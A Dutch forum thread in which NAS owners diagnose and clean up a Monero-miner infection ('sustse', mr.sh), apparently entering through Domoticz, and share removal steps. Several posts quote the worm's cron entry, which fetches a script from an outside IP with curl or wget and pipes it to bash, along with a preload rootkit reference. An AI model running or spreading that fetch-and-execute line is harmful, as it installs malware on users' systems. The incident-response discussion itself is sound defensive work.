Bericht door: mbomhof op 13 juni 2019, 17:47:53
sinds vanmorgen is het me opgevallen dat een voor mij onbekend proces de processor van mijn DS216+II volledig belast.
PID USER PR NI VIRT RES %CPU %MEM TIME+ S COMMAND
1974 root 20 0 262.1m 5.0m 182.2 0.6 0:40.36 S /var/tmp/sustse -c /var/tmp/wc.conf
Het killen van dit proces helpt en de processor wordt weer rustig.
Echter komt dit proces na een paar minuten weer terug.
Het verwijderen van 'sustse' en de config 'wc.conf' heeft geen effect, ook deze komen weer terug.
Een aantal zoekacties op Google levert me dit op, maar ik kan er geen wijs uit worden:
https://gist.github.com/5shekel/b54824ebd6be4bd75442e1480d5f68b2
https://www.digitalocean.com/community/questions/what-is-this-sustes-in-my-process-in-my-cpu-stats
Cronjobs als beschreven kan ik niet terug vinden...
Maar het lijkt er op dat mijn NAS als een of andere miner staat te stampen.
Niet waar ik hem graag voor wil inzetten en zeker niet door mij ingesteld.
Wie kan mij helpen dit proces voor eens en voor altijd te killen...?
Bericht door: mbomhof op 13 juni 2019, 18:16:36
op de locatie /etc/cron.hourly/ vind ik een bestand met de naam 'oanacroner1'.
met daarin de volgende regel:
(curl -s http://107.174.47.156/mr.sh||wget -q -O - http://107.174.47.156/mr.sh)|bash -sh
Het verwijderen van dit bestand heeft ook geen effect, komt na een paar minuten terug...
Bericht door: Hofstede op 13 juni 2019, 18:30:16
Bericht door: mbomhof op 13 juni 2019, 18:57:18
Aangezien ik aardig wat draai op mijn NAS en ik er ook behoorlijk wat data op heb staan dat ik niet direct ergens anders kan opslaan, heeft dit natuurlijk niet mijn voorkeur.
Ik heb momenteel het ip adres in het bestand 'oanacroner1' in mijn firewall geblokkeerd en voorlopig zie ik het proces niet terug komen.
Ook heb ik het bestand verwijderd alsmede de bestanden /var/tmp/sustse en /var/tmp/wc.conf.
Ook die komen momenteel niet terug.
Mogelijk hiermee de tijd gewonnen om toch eens verder te zoeken naar een oplossing anders dan opnieuw inrichten...
Bericht door: DSGebruiker op 13 juni 2019, 19:31:29
Bericht door: Briolet op 13 juni 2019, 19:42:42
Aangezien ik aardig wat draai op mijn NAS en ik er ook behoorlijk wat data op heb staan dat ik niet direct ergens anders kan opslaan, heeft dit natuurlijk niet mijn voorkeur.
Op zich zal het opnieuw installeren van dsm, van de data op shares afblijven. De kans is dan redelijk dan je de miner kwijt raakt. Maar het blijft vervelend als je niet weet hoe de infectie is gestart. Dan kan het zo weer gebeuren. Staat ssh of telnet open? Dan zou je ook in het "bash_history.log" kunnen zoeken rond het moment van besmetting. (/var/log/bash_history.log)
Bericht door: mc_ op 14 juni 2019, 10:08:57
Als ik inlog via SSH (met Putty), en wanneer ik commando's ingeef, krijg ik de volgende foutmelding:
Code: [Selecteer]
ERROR: ld.so: object '/usr/local/lib/libkk.so' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
Als ik naar de betreffende directory ga dan tref ik het bestand libkk.so niet aan.
Af en toe krijg ik ook deze melding:
Code: [Selecteer]
ERROR: ld.so: object '/usr/local/lib/libkk.so' from /etc/ld.so.preload cannot be preloaded (file too short): ignored.
(net een andere melding)of deze:
Code: [Selecteer]
ERROR: ld.so: object '/usr/local/lib/libkk.so' from /etc/ld.so.preload cannot be preloaded (wrong ELF class: ELFCLASS64): ignored.
Ik vermoed dat het te maken heeft met de recente update van PHP5.6 (aangezien dat één van de weinige wijzigingen is geweest), maar wellicht is het ernstiger.
Iemand die bekend is met deze foutmelding?
Bericht door: Birdy op 14 juni 2019, 10:37:54
Denk dat je even moet Googlen op die fout meldingen.
Ze komen weinig voor.
Overweging: DSM herinstalleren.
Bericht door: Briolet op 14 juni 2019, 11:32:27
Toevallig kwam ik deze (https://www.security.nl/posting/612985/Mailservers+actief+aangevallen+via+beveiligingslek+in+Exim) vandaag tegen. Daar installeert kwaadaardige software, via een recent lek in een mailserver een ssh key zodat ze via ssh kunnen inloggen met rootrechten. Dat is via een Exim server en niet via postfix die Synology gebruikt voor Mailserver. (Ik weet niet waar mailserver plus op gebaseerd is. (Edit: geen Exim volgens Synology))
In elk geval reden om toch op korte termijn in jouw foutmelding te duiken.
Bericht door: mc_ op 14 juni 2019, 13:49:52
Saillant detail: AntiVirus is nu al meer dan een dag aan het initialiseren, dus scannen lukt ook niet op dit moment...
Ik kijk even waar Synology Support mee komt.
Bericht door: mc_ op 14 juni 2019, 14:03:35
Code: [Selecteer]
*/1 * * * * root (curl -s http://107.173.102.59/mr.sh||wget -q -O - http://107.173.102.59/mr.sh)|bash -sh
##En hetzelfde in een bestand genaamd oanacroner1 in /etc/cron.hourly/
Worm dus. Ik heb deze bestanden verwijderd.
Nog meer acties nodig, voor zover bekend?
Bericht door: Birdy op 14 juni 2019, 14:27:13
Maar het SSH inloggen zal nog we fouten opleveren?
Bericht door: mc_ op 14 juni 2019, 14:28:42
Bericht door: Pippin op 14 juni 2019, 14:36:58
Vraag je af hoe het op je NAS gekomen is.....
Bericht door: mc_ op 14 juni 2019, 14:45:22
https://www.domoticz.com/forum/viewtopic.php?f=6&t=28329
Kan niet anders dan dit het is. Ik heb de meeste voorgestelde stappen gevolgd (niet alles lukt of tref ik aan).
De foutmelding is weg, maar nog even goed napluizen wat er eventueel nog achtergebleven kan zijn.
Iemand toevallig een step-by-step guide liggen hoe Domoticz als niet-root gebruiker te draaien?
EDIT: vraag is natuurlijk hoe Domoticz te draaien zonder root, niet Synology ::)
Bericht door: Birdy op 14 juni 2019, 15:28:40
Je kunt wel een sterk wachtwoord instellen voor admin (het ww van root is namelijk die va admin)
Je kunt ook een nieuwe gebruiker maken met admin rechten en die ook een ster ww geven.
Als dat is gedaan, dan kan je admin uitschakelen.
Bericht door: mc_ op 14 juni 2019, 15:32:07
Heb inderdaad admin uitgeschakeld, eerste actie bij inrichten van DSM :-)
Bericht door: Birdy op 14 juni 2019, 15:45:21
Bericht door: Henk Havelaar op 14 juni 2019, 23:10:55
Wat is het IP adres van 'oanacroner1? dan kan ik dat in ieder geval blokkeren in de firewall.
Bericht door: Briolet op 14 juni 2019, 23:59:11
In beide topics zit het commando om een executable file op te halen "107.174.47.156/mr.sh".
Beter om in één topic verder te gaan. Nu al 3 meldingen in 24 uur op dit forum. Ook elders zijn de meldingen steeds heel recent.
Bericht door: Briolet op 15 juni 2019, 00:13:59
Als ik op zo'n IP google vind ik b.v. al 4 meldingen van ca 2 maand geleden op een site (https://www.liveipmap.com/107.174.47.156) waar misbruik gemeld wordt:
[attachimg=1]
Hoewel er niet vanaf dat IP gehacked is. De hack (of zelf gestarte, besmette software) is eerder binnengekomen en haalt op dat adres een script op voor verdere infectie.
Bericht door: Birdy op 15 juni 2019, 10:32:02
Beter om in één topic verder te gaan. Nu al 3 meldingen in 24 uur op dit forum. Ook elders zijn de meldingen steeds heel recent.De 2 Topics samen gevoegd.
Bericht door: mbomhof op 15 juni 2019, 10:59:45
Ik heb de bestanden in /etc/cron.d/ leeg gemaakt;
Ik heb het bestand in /etc/cron.hourly/ verwijderd;
Ik heb het bestand /var/tmp/wc.conf verwijderd;
Ik heb het bestand /var/tmp/sustse verwijderd;
Ik heb ip adres 107.174.47.156 in mijn firewall geblokkeerd;
Ik heb alle actieve processen die mr.sh bevatten gekilled (ps aux | grep mr.sh).
Ik draai inderdaad ook Domoticz en deze heb ik direct bijgewerkt naar de meest recente versies.
Ik zie momenteel geen processen meer gestart worden en ik zie geen bestanden meer terug komen.
Fingers crossed!
Dank voor alle reacties zo ver!
Bericht door: mbomhof op 15 juni 2019, 11:02:21
root 14912 0.0 0.1 9604 1204 ? Ss 11:00 0:00 /bin/sh -c (curl -s http://107.174.47.156/mr.sh||wget -q -O - http://107.174.47.156/mr.sh)|bash -sh
root 14914 0.0 0.0 9608 652 ? S 11:00 0:00 /bin/sh -c (curl -s http://107.174.47.156/mr.sh||wget -q -O - http://107.174.47.156/mr.sh)|bash -sh
root 14916 0.0 0.5 85936 5468 ? S 11:00 0:00 curl -s http://107.174.47.156/mr.sh
root 17968 0.0 0.1 23132 964 pts/6 S+ 11:01 0:00 grep --color=auto mr.sh
(maar al wel een stuk minder).
Bericht door: Henk Havelaar op 15 juni 2019, 11:05:28
Bericht door: eaz op 15 juni 2019, 11:18:18
https://www.domoticz.com/forum/viewtopic.php?f=6&t=28329&sid=aa8def5554c1013476538ee56924114d
edit: sorry, ik zie net dat dit al gepost was, door de merge erbij gekomen:-)
Bericht door: Briolet op 15 juni 2019, 12:18:36
Bericht door: mc_ op 15 juni 2019, 13:26:06
Complimenten overigens voor alle snelle reacties, mooi te zien hoe dit probleem aangepakt wordt door de community! :)
Bericht door: mbomhof op 15 juni 2019, 13:40:36
ps aux | grep mr.sh
Bericht door: Briolet op 15 juni 2019, 14:24:09
Geen oplossing voor het verwijderen, maar het geeft wel een idee wat mr.sh doet.
Bericht door: eaz op 15 juni 2019, 14:54:50
http://udurrani.com/0fff/monero_mining.pdf
Bericht door: mbomhof op 15 juni 2019, 15:17:08
Vooralsnog lijkt het er op dat ik hem volledig kwijt ben.
Geen piekbelasting meer op de processor, geen actieve processen inzake 'mr.sh' en/of 'sustse'.
Er blijken ook mr.sh regels in de database van Domoticz te staan.
Die heb ik ook verwijderd middels een database editor.
Op deze manier heb ik alles kunnen opschonen:
Domoticz:
Open domoticz en maak een backup van de database via 'Instellingen --> Instellingen --> Backup/Herstel --> Backup database'.
Middels een database edit tool de database openen, ik heb hiervoor 'DB Browser for SQLite' gebruikt.
https://sqlitebrowser.org/dl/
Open de database file die je hebt opgeslagen.
Op het tabblad 'Browse Data' kun je de tabel 'CustomImages' openen.
Hier zal je een regel in zien staan die ook mr.sh bevat.
Verwijder de regel middels 'Rechtsklik --> Delete Record'.
Sla de wijzigingen op middels de 'Write Changes' knop.
Lees de aanpassing in Domoticz in via 'Instellingen --> Instellingen --> Backup/Herstel --> Database herstellen'.
Herstart Domoticz.
Indien je Domoticz nog niet hebt bijgewerkt naar de laatste versie is dit direct de mogelijkheid dat te doen en het 'lek' te dichten.
http://www.jadahl.com/
NAS:
Log in op de NAS middels ssh.
Middels de 'vi' editor kunnen de verschillende regels uit de cron bestanden verwijderd worden.
('sudo' voor het openen van de editor met root rechten).
Voer de onderstaande regels uit.
Na het uitvoeren van 1 regel, opent een editor waar de je regel inzake mr.sh zou moeten zien.
(Zoiets: */1 * * * * root (curl -s http://107.174.47.156/mr.sh||wget -q -O - http://107.174.47.156/mr.sh)|bash -sh)
Middels de delete knop de regel verwijderen.
Bestand opslaan door ':w' en 'enter'.
vi editor sluiten door ':q' en 'enter'.
Herhaal voor alle 4 bestanden.
sudo vi /etc/cron.d/apache
sudo vi /etc/cron.d/root
sudo vi /var/spool/cron/root
sudo vi /var/spool/cron/crontabs/root
Vervolgens de verschillende aangemaakte bestanden verwijderen met de volgende commando's:
sudo rm /etc/cron.hourly/oanacroner1
sudo rm /var/tmp/sustse
sudo rm /var/tmp/wc.conf
Voor de zekerheid de NAS herstarten!
Let op, als één van de bestanden weer uitgevoerd wordt als je nog niet alles hebt aangepast, kun je opnieuw beginnen.
Misschien de internet verbinding tijdelijk verbreken of net als ik in de firewall het ip adres blokkeren, zodat het script niet succesvol uitgevoerd kan worden.
Voorlopig blijf ik de NAS monitoren om te kijken of er nog wat gebeurt.
Ook heb ik het IP adres nog steeds geblokkeerd in mijn firewall.
Als de NAS stabiel blijft zonder tekenen van sustse en/of mr.sh, ga ik ook de regel uit de firewall halen om te kijken of het terug komt.
Bericht door: Henk Havelaar op 16 juni 2019, 17:10:47
Ik heb SSH en admin geactiveerd is de NAS en op mijn remote PC Putty gedownload en geïnstalleerd, port geforward in de router etc. Met Putty kan ik inloggen via SSH in de NAS, tot zover geen probleem. (NAS staat in Nederland, ik ben in Portugal).
Als ik de eerste regel sudo vi /etc/cron.d/apache invoer dan wordt er weer naar een paswoord gevraagd, dat geef ik in en de enige regel die verschijnt is gelijk de goede met daaronder een aantal blanco regels die beginnen met blauwe~, de tekstregel kan ik weghalen met de delete toets maar dan komt het. Wat ik ook probeer, alles wat ik invoer zoals w of -q werkt neit, heb jij enig idee wat ik verkeerd doe?
Bericht door: Birdy op 16 juni 2019, 17:16:42
Bericht door: Briolet op 16 juni 2019, 17:59:49
…Ik heb SSH en admin geactiveerd … port geforward in de router etc.…
Ik weet niet welke poorten, maar dat is:
1e niet nodig
2e zeer gevaarlijk als dat poort 22 is.
Bericht door: Birdy op 16 juni 2019, 18:08:29
Bericht door: mbomhof op 16 juni 2019, 18:12:54
Ik weet niet welke poorten, maar dat is:
1e niet nodig
2e zeer gevaarlijk als dat poort 22 is.
Inderdaad snel weer dicht zetten als je het niet meer nodig hebt!
Of liever nog alleen via een VPN of iets dergelijks gebruiken en helemaal niet naar het internet open!
Als ik de eerste regel sudo vi /etc/cron.d/apache invoer dan wordt er weer naar een paswoord gevraagd,
Dit komt omdat je met het 'sudo' commando de editor opent als 'root', hiervoor dus nogmaals een wachtwoord invoeren.
Wat ik ook probeer, alles wat ik invoer zoals w of -q werkt neit,
Zoals Birdy terecht aan geeft, mogelijk zit je in de editor modus.
Deze verlaten met <esc>.
Vervolgens :wq intypen (verschijnt onderin het scherm als het goed is) en sluiten met <enter>.
Eerst de <esc> toets indrukken dan :wq en <enter>
Bericht door: Henk Havelaar op 16 juni 2019, 18:22:12
Ik weet niet welke poorten, maar dat is:
1e niet nodig
2e zeer gevaarlijk als dat poort 22 is.
[/quote]
Dat zal wel moeten, ik ben nu in Portugal en de NAS draait in Nederland. Gelukkig heb ik in NL ook een PC'tje draaien waarmee ik via VNC de router kan aanpassen.
Birdy, ook bedankt.
Bericht door: Henk Havelaar op 16 juni 2019, 18:36:23
Bericht door: Birdy op 16 juni 2019, 19:09:44
:wq
Bericht door: Henk Havelaar op 16 juni 2019, 20:40:03
Ik zal het thuis moeten doen zodat ik de internet verbinding met de NAS kan weghalen.
Bericht door: mc_ op 16 juni 2019, 22:09:36
Bericht door: Henk Havelaar op 17 juni 2019, 10:31:52
Hopelijk komt het ook niet meer terug.
@mbomhof, bij jou alles ook nog rustig??
Bericht door: mbomhof op 17 juni 2019, 15:20:59
Geen gekke dingen meer tegen gekomen.
Ook het IP adres in de firewall weer vrij gegeven.
Bericht door: Henk Havelaar op 17 juni 2019, 21:11:53
Bericht door: Briolet op 17 juni 2019, 21:19:44
Virusscan werkt nu ook weer…
Kan zijn dat mr.sh dit inderdaad blokkeerde. Het eerste wat mr.sh doen is namelijk het bekijken van lopende processen en er een paar killen. Uit eerdere link met analyse:
Citaat
An initial connection-check wants to take down unwanted software on the victim side (awk ‘{print $7}’ | sed -e “s/\/.*//g”) taking decisions upon specific IP addresses. It filters PID from connection states and it directly kills them (kill -9).
Maar goed ook (uit zicht van de mallware) omdat de virusscanner deze goed herkent.
Bericht door: eddym op 19 juni 2019, 13:04:23
/etc/crond/root
en
/etc/crond/apache
besmet.
/bin/curl tijdelijk ombenoemd naar /bin/curl.xyz
Maar geen 'onbekend' sutse (o.i.d.) proces gevonden!!
Nu maar weer reboot.
Bericht door: Henk Havelaar op 19 juni 2019, 22:42:32
Na inlog via SSH en wat zoekwerk op internet heb ik met het commando "ps aux" het PID achterhaald van sutste en het is gelukt om het proces te killen.
Tot op heden is het niet meer terug gekomen maar als ik nu inlog via SSH krijg ik steeds de volgende melding:
ERROR: ld.so: object '/usr/local/lib/libkk.so' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
Daarna wordt het ingegeven commando normaal uit gevoerd. Iemand enig idee wat de melding betekend en wat ik kan doen om deze melding te verwijderen? (Komt na elk ingevoerd commando terug)
Bericht door: Hofstede op 19 juni 2019, 22:57:20
Niet dat je dat wilt horen natuurlijk.
Bericht door: Henk Havelaar op 19 juni 2019, 23:01:55
Is er een manier om de NAS te herinstalleren met behoud van de data? Ik kan helaas geen bijna 41 TB back-uppen.
Bericht door: Hofstede op 20 juni 2019, 09:18:39
Zie: https://www.synology.com/nl-nl/knowledgebase/DSM/tutorial/General_Setup/How_to_reset_my_Synology_NAS
Je moet dan reset procedure Modus 2 gebruiken. Dan wordt DSM gewist maar de data niet.
Een backup is dan natuurlijk wel aan te bevelen want er is altijd een risico. Maar ik ga er van uit dat je van de echt waardevolle data al een backup hebt, die heb je natuurlijk niet alleen maar op de NAS staan.
Bericht door: mbomhof op 20 juni 2019, 10:43:52
ERROR: ld.so: object '/usr/local/lib/libkk.so' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
sudo vi /etc/ld.so.preload
Regel verwijderen (of uitschakelen door er een # voor te zetten).
Opslaan middels inmiddels welbekende <esc> en :wq
Bericht door: Henk Havelaar op 20 juni 2019, 11:14:17
Bericht door: mc_ op 28 juni 2019, 09:05:55
./domoticz/www/images/fakeicon.png
./domoticz/www//images/fakeicon48_Off.png
./domoticz/www//images/fakeicon48_On.png
Bericht door: Basssment op 04 juli 2019, 23:10:15
Dankzij deze post heb ik mijn probleem op kunnen lossen.
Ik kwam er achter toen mijn offsite backup plots niet meer werkte.
na een hoop veranderen bleef deze fout gaan.
Na verwijderen van de malware werkt alles weer op een rustig niveau!
:clap:
Bericht door: Runu88 op 13 november 2019, 15:38:27
zou je kunnen toelichten waar ik deze regel moet verwijderen ? ik zit namelijk met hetzelfde probleem.
alvast bedankt
Bericht door: Birdy op 13 november 2019, 15:46:24
Bericht door: Runu88 op 15 november 2019, 16:40:39